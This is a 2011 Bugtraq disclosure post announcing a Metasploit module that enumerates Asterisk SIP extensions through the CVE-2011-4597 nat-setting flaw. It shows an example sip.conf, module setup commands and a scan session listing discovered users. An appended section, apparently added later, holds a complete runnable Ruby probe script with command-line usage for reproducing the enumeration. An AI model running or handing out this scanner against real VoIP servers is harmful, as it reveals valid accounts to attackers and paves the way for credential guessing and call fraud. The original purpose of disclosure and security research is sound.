Message-ID: <4EF2F1F5.5060300@wushu.net.nz>
Date: Thu, 22 Dec 2011 22:01:41 +1300
From: Ben Williams <ben+bugtraq@...hu.net.nz>
To: Voipsec@...psa.org, bugtraq@...urityfocus.com
Subject: Exploit for Asterisk Security Advisory AST-2011-013
A Metasploit module is attached that demonstrates how to enumerate
Asterisk SIP peers that have a nat setting different from the global SIP
nat setting, as described in Asterisk Security Advisory AST-2011-013.
The example below finds all peers with nat=yes, but the Metasploit module
will also work when global nat=yes and peers have nat=no.
Vulnerability discovered and exploit created by Ben Williams.
References:
http://downloads.asterisk.org/pub/security/AST-2011-013.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4597
Example sip.conf:
[general]
context=default
alwaysauthreject = yes
[1000]
nat=yes
type=peer
secret=12345cdsf0sd9r2e9
callerid=John Doe <1000>
host=dynamic
context=trusted
[1001]
nat=yes
secret=12345
type=peer
host=dynamic
[1002]
secret=12345a
type=peer
host=dynamic
# svn co https://www.metasploit.com/svn/framework3/trunk/
# cp enumerator_asterisk_nat_peers.rb trunk/modules/auxiliary/scanner/sip/
# cd trunk
# msfconsole
=[ metasploit v4.0.0-release [core:4.0 api:1.0]
+ -- --=[ 716 exploits - 362 auxiliary - 68 post
+ -- --=[ 226 payloads - 27 encoders - 8 nops
=[ svn r13462 updated 143 days ago (2011.08.01)
Warning: This copy of the Metasploit Framework was last updated 143 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306
msf > use auxiliary/scanner/sip/enumerator_asterisk_nat_peers
msf auxiliary(enumerator_asterisk_nat_peers) > info
Name: SIP Username Enumerator for Asterisk (UDP) Security Advisory AST-2011-013, CVE-2011-4597
Module: auxiliary/scanner/sip/enumerator_asterisk_nat_peers
Version: 1
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Ben Williams
Basic options:
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
BATCHSIZE  256              yes       The number of hosts to probe in each set
CHOST                       no        The local client address
CPORT      5070             no        The local client port
MAXEXT     9999             yes       Ending extension
MINEXT     0                yes       Starting extension
PADLEN     4                yes       Zero padding maximum length
RHOSTS                      yes       The target address range or CIDR identifier
RPORT      5060             yes       The target port
THREADS    1                yes       The number of concurrent threads
Description:
REGISTER scan for numeric peer usernames having a nat setting
different from the global SIP nat setting. Works even when
alwaysauthreject=yes. For this exploit to work, the source port
cannot be 5060. For more details see Asterisk Project Security
Advisory AST-2011-013.
msf auxiliary(enumerator_asterisk_nat_peers) > set RHOSTS 172.16.0.1
RHOSTS => 172.16.0.1
msf auxiliary(enumerator_asterisk_nat_peers) > set MINEXT 1000
MINEXT => 1000
msf auxiliary(enumerator_asterisk_nat_peers) > set MAXEXT 2000
MAXEXT => 2000
msf auxiliary(enumerator_asterisk_nat_peers) > run
[*] Found user: 1000 <sip:1000@....16.0.1> [Auth]
[*] Found user: 1001 <sip:1001@....16.0.1> [Auth]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(enumerator_asterisk_nat_peers) >
Download attachment "enumerator_asterisk_nat_peers.rb" of type "application/x-ruby" (5396 bytes)
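The probe the session above relies on, as an added example that is not the attached Metasploit module and not Asterisk's own code: a REGISTER is sent from local port 5070 while its Via header claims port 5060. A peer whose nat setting differs from the [general] section (nat=yes, as for 1000 and 1001 in the sip.conf above) answers to the port the packet actually came from, so a 401 arriving on 5070 reveals that the extension exists even with alwaysauthreject=yes; an extension with no such peer gets no reply on 5070. The addresses, ports, branch values and the sample replies in the check are constructed for illustration.

```ruby
# Added example, not the attached Metasploit module: a minimal REGISTER probe
# for the AST-2011-013 / CVE-2011-4597 condition described in the post.
# The request leaves local port 5070 but its Via header claims port 5060.
# A peer whose nat setting differs from [general] (nat=yes here, as in the
# post's sip.conf) sends its reply to the port the packet really came from,
# so a 401 landing on 5070 tells us the extension exists. Host addresses,
# ports and branch values are assumptions for illustration.
require 'socket'
require 'securerandom'

# Build one REGISTER for +ext+ at +host+. +src_host+ is our own address as
# written into Via/Contact; +via_port+ is the port Via advertises, chosen
# to differ from the socket's real source port.
def build_register(host, ext, src_host, via_port, branch = SecureRandom.hex(8))
  [
    "REGISTER sip:#{host} SIP/2.0",
    "Via: SIP/2.0/UDP #{src_host}:#{via_port};branch=z9hG4bK#{branch}",
    "From: <sip:#{ext}@#{host}>;tag=#{branch}",
    "To: <sip:#{ext}@#{host}>",
    "Call-ID: #{branch}@#{src_host}",
    'CSeq: 1 REGISTER',
    "Contact: <sip:#{ext}@#{src_host}:#{via_port}>",
    'Max-Forwards: 70',
    'Content-Length: 0',
    '', ''
  ].join("\r\n")
end

# Label a reply the way the session above does: a 401/407 challenge is
# reported as Auth, a 200 (peer without a secret) as Open, anything else by
# its status code. Returns nil for data that is not a SIP response at all.
def classify_response(data)
  m = data.match(%r{\ASIP/2\.0 (\d{3}) })
  return nil unless m
  case m[1].to_i
  when 401, 407 then 'Auth'
  when 200 then 'Open'
  else m[1]
  end
end

# Address the kernel would use to reach +host+ (connect on a UDP socket only
# selects the route; no packet is sent).
def local_address_for(host)
  s = UDPSocket.new
  s.connect(host, 5060)
  s.addr[3]
ensure
  s.close if s
end

# Probe each extension in +exts+ from +cport+ and return { ext => label } for
# those whose reply arrived at +cport+ instead of the Via port.
def scan(host, exts, rport: 5060, cport: 5070, timeout: 1.0)
  raise ArgumentError, 'source port must differ from the Via port (5060)' if cport == rport
  src = local_address_for(host)
  sock = UDPSocket.new
  sock.bind('0.0.0.0', cport)
  found = {}
  exts.each do |ext|
    branch = SecureRandom.hex(8)
    sock.send(build_register(host, ext, src, rport, branch), 0, host, rport)
    next unless IO.select([sock], nil, nil, timeout)
    data, = sock.recvfrom(4096)
    # Only count a reply that echoes our branch, so a late answer for the
    # previous extension is not credited to this one.
    label = classify_response(data)
    found[ext] = label if label && data.include?(branch)
  end
  found
ensure
  sock.close if sock
end

if $PROGRAM_NAME == __FILE__ && ARGV.size == 3
  host, first, last = ARGV[0], ARGV[1].to_i, ARGV[2].to_i
  scan(host, first..last).each { |ext, label| puts "Found user: #{ext} [#{label}]" }
end
```

Run as `ruby probe.rb 172.16.0.1 1000 2000` to reproduce the session above against a lab box; the script refuses to run with a source port of 5060 because the whole signal is the mismatch between the Via port and the real source port. For the inverted case the post mentions (global nat=yes, peers nat=no) the existing peers are the ones whose reply does not arrive at 5070, so that variant needs the reply behaviour of a known-nonexistent extension as a baseline; this example only implements the nat=yes case shown in the session.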